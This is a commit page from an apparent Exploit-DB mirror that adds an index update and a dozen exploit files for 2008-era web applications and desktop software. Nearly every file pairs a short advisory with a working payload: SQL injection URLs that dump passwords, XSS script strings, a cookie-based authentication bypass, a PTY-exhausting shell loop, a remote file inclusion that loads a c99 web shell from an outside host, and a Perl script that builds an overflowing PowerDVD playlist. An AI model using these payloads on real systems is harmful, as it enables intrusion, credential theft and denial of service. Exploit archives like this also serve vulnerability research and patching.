bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 03_09_2014

Browse source
This commit is contained in:
Offensive Security 2014-03-09 04:29:44 +00:00
parent d21bce8f22
commit d1566a5701
14 changed files with 168 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

13
files.csv
View file

@ -28880,3 +28880,16 @@ id,file,description,date,author,platform,type,port
32099,platforms/php/webapps/32099.txt,"RunCMS 1.6.1 votepolls.php bbPath[path] Parameter Remote File Inclusion",2008-07-21,Ciph3r,php,webapps,0 32099,platforms/php/webapps/32099.txt,"RunCMS 1.6.1 votepolls.php bbPath[path] Parameter Remote File Inclusion",2008-07-21,Ciph3r,php,webapps,0
32100,platforms/php/webapps/32100.txt,"RunCMS 1.6.1 config.php bbPath[root_theme] Parameter Remote File Inclusion",2008-07-21,Ciph3r,php,webapps,0 32100,platforms/php/webapps/32100.txt,"RunCMS 1.6.1 config.php bbPath[root_theme] Parameter Remote File Inclusion",2008-07-21,Ciph3r,php,webapps,0
32101,platforms/php/webapps/32101.txt,"eSyndiCat 1.6 'admin_lng' Cookie Parameter Authentication Bypass Vulnerability",2008-07-21,Ciph3r,php,webapps,0 32101,platforms/php/webapps/32101.txt,"eSyndiCat 1.6 'admin_lng' Cookie Parameter Authentication Bypass Vulnerability",2008-07-21,Ciph3r,php,webapps,0
32102,platforms/php/webapps/32102.txt,"AlphAdmin CMS 1.0.5_03 'aa_login' Cookie Parameter Authentication Bypass Vulnerability",2008-07-21,Ciph3r,php,webapps,0
32103,platforms/php/webapps/32103.txt,"VisualPic 0.3.1 Cross-Site Scripting Vulnerability",2008-07-21,Ciph3r,php,webapps,0
32105,platforms/windows/dos/32105.pl,"PowerDVD 8.0 '.m3u' and '.pls' File Multiple Buffer Overflow Vulnerabilities",2008-07-22,LiquidWorm,windows,dos,0
32106,platforms/php/webapps/32106.txt,"Claroline 1.8 learnPath/calendar/myagenda.php Query String XSS",2008-07-22,DSecRG,php,webapps,0
32107,platforms/php/webapps/32107.txt,"Claroline 1.8 user/user.php Query String XSS",2008-07-22,DSecRG,php,webapps,0
32108,platforms/php/webapps/32108.txt,"Claroline 1.8 tracking/courseLog.php view Parameter XSS",2008-07-22,DSecRG,php,webapps,0
32109,platforms/php/webapps/32109.txt,"Claroline 1.8 tracking/toolaccess_details.php toolId Parameter XSS",2008-07-22,DSecRG,php,webapps,0
32110,platforms/multiple/remote/32110.txt,"Outpost Security Suite Pro 2009 Filename Parsing Security Bypass Vulnerability",2008-07-22,"Juan Pablo Lopez Yacubian",multiple,remote,0
32111,platforms/asp/webapps/32111.txt,"Pre Survey Generator 'default.asp' SQL Injection Vulnerability",2008-07-22,DreamTurk,asp,webapps,0
32112,platforms/linux/dos/32112.txt,"Minix 3.1.2a Psuedo Terminal Denial of Service Vulnerability",2008-07-23,kokanin,linux,dos,0
32113,platforms/php/webapps/32113.txt,"EMC Centera Universal Access 4.0_4735.p4 'username' Parameter SQL Injection Vulnerability",2008-07-23,"Lars Heidelberg",php,webapps,0
32114,platforms/php/webapps/32114.txt,"AtomPhotoBlog 1.15 'atomPhotoBlog.php' SQL Injection Vulnerability",2008-07-24,Mr.SQL,php,webapps,0
32116,platforms/php/webapps/32116.txt,"ezContents 'minicalendar.php' Remote File Include Vulnerability",2008-07-25,"HACKERS PAL",php,webapps,0

Can't render this file because it is too large.

7
platforms/asp/webapps/32111.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/30349/info
Pre Survey Generator is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/poll/default.asp?catid=1+union+select+0,password+from+users

21
platforms/linux/dos/32112.txt Executable file
View file

@ -0,0 +1,21 @@
source: http://www.securityfocus.com/bid/30357/info
Minix is prone to a denial-of-service vulnerability.
An attacker can exploit this issue to prevent users from opening new pseudo terminals, denying service to legitimate users.
Minix 3.1.2a is vulnerable; other versions may also be affected.
$ uname -a
Minix 192.168.1.2 3 1.2a i686
$ while true ; do (yes "yes yes minix uh ah"&) ; done
[snip snip]
$ ^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C
...disconnected
telnet 192.168.1.2
Trying 192.168.1.2...
Connected to 192.168.1.2.
Escape character is '^]'.
I am sorry, but there is no free PTY left!
Connection closed by foreign host.

16
platforms/multiple/remote/32110.txt Executable file
View file

@ -0,0 +1,16 @@
source: http://www.securityfocus.com/bid/30347/info
Outpost Security Suite Pro is prone to a vulnerability that allows an unauthorized attacker to bypass antivirus and firewall rules. This issue occurs because the application fails to adequately sanitize user-supplied input.
Successful exploits can allow malicious data to evade expected detection rules, giving legitimate users a false sense of security. Other attacks may also be possible.
Outpost Security Suite Pro 2009 is vulnerable; other versions may also be affected.
ASCII: 
HEX: 26 23 31 32 32 38 38 3b
The following special character in a filename can evade firewall rules:
ASCII:? ? ? ‣ ․ ‥ ?
HEX: 86 20 87 20 95 20 26 23 38 32 32 37 3b 20 26 23 38 32 32 38 3b 20
26 23 38 32 32 39 3b 20 85

9
platforms/php/webapps/32102.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/30333/info
AlphAdmin CMS is prone to an authentication-bypass vulnerability because it fails to adequately verify user-supplied input used for cookie-based authentication.
An attacker can exploit this vulnerability to gain administrative access to the affected application; other attacks are also possible.
AlphAdmin CMS 1.0.5_03 is vulnerable; other versions may also be affected.
javascript:document.cookie = "aa_login=1; path=/";

11
platforms/php/webapps/32103.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/30334/info
VisualPic is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
VisualPic 0.3.1 is vulnerable; other versions may be affected as well.
http://www.example.com/visualpic/?login&pic=>"><script>alert("XSS")</script>
http://www.example.com/visualpic/?pic=%00'"><script>alert("XSS")</script>
http://www.example.com/visualpic/?login&pic=>"><script>alert("XSS")</script>

10
platforms/php/webapps/32106.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/30346/info
Claroline is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Versions prior to Claroline 1.8.11 are vulnerable.
http://www.example.com/[installdir]/claroline/calendar/myagenda.php?"><script>alert(&#039;DSecRG
XSS&#039;)</script>

10
platforms/php/webapps/32107.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/30346/info
Claroline is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Versions prior to Claroline 1.8.11 are vulnerable.
http://www.example.com/[installdir]/claroline/user/user.php?"><script>alert(&#039;DSecRG
XSS&#039;)</script>

10
platforms/php/webapps/32108.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/30346/info
Claroline is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Versions prior to Claroline 1.8.11 are vulnerable.
http://www.example.com/[installdir]/claroline/tracking/courseLog.php?view=DSec"
STYLE="xss:expression(alert(&#039;DSecRG XSS&#039;))

10
platforms/php/webapps/32109.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/30346/info
Claroline is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Versions prior to Claroline 1.8.11 are vulnerable.
http://www.example.com/[installdir]/claroline/tracking/toolaccess_details.php?toolId="><script>alert(&#039;DSecRG
XSS&#039;)</script>

10
platforms/php/webapps/32113.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/30358/info
EMC Centera Universal Access (CUA) is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
CUA 4.0_4735.p4 is vulnerable; other versions may also be affected.
Username: valid_user_name
Password: --

9
platforms/php/webapps/32114.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/30360/info
AtomPhotoBlog is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
AtomPhotoBlog 1.15b1 is vulnerable; other versions may also be affected.
http://www.example.com/atomPhotoBlog.php?do=show&photoId=969696+union+select+0,0,0,0,0,0,0,0,0,0,0,mail,pass,0+from+user

7
platforms/php/webapps/32116.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/30373/info
ezContents CMS is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker can exploit this issue to execute malicious PHP code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
http://www.example.com/modules/calendar/minicalendar.php?GLOBALS[rootdp]=./&GLOBALS[gsLanguage]=http://www.example2.com/soqor10/c99.txt?

25
platforms/windows/dos/32105.pl Executable file
View file

@ -0,0 +1,25 @@
source: http://www.securityfocus.com/bid/30341/info
PowerDVD is prone to multiple buffer-overflow vulnerabilities because it fails to perform adequate boundary checks on user-supplied input.
Successfully exploiting these issues may allow remote attackers to execute arbitrary code in the context of the application. Failed exploit attempts will cause denial-of-service conditions.
PowerDVD 8.0 is vulnerable; prior versions may also be affected.
#!/usr/bin/perl
#
# CyberLink PowerDVD <= 8.0 Crafted PLS/M3U Playlist File Buffer Overflow Exploit
# Coded by Gjoko "LiquidWorm" Krstic
# liquidworm [At] gmail.com
# http://www.zeroscience.org
#
$buffer = "J" x 520000;
open(m3u, ">./evil_list.m3u"); # or .pls
print m3u "$buffer";
print "\n--> Evil Playlist created... Have fun!\n";
# July, 2008